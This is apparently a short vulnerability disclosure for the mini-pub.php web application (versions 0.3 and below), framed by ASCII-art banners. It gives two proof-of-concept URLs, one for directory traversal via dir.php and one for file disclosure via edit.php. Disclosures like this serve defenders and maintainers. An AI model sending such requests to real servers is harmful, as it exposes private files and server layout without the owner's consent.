mini-pub versions 0.3 and below suffer from local directory traversal and file disclosure vulnerabilities.
882cf8ebf2f23c8655712cd3a91c2bfb0b98b10af16e7cc4f3677136ca9c70d2
_____ ____ __ __ _ ____ ____ ____
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|
| | | |_) | \ V / / _ \ | | _ | | | |
| | | _ < | | / ___ \ | |_| | _ | |___ | |___
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|
mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities
Script : http://mini-pub.sourceforge.net/
I- Local Directory Traversal
POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL
II- File Disclosure
POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php
____ _ _ __ __
/ ___| ___ | | __| | | \/ |
| | _ / _ \ | | / _` | | |\/| |
| |_| | | (_) | | |___ | (_| | | | | |
\____| \___/ |_____| \__,_| _____ |_| |_|
|_____|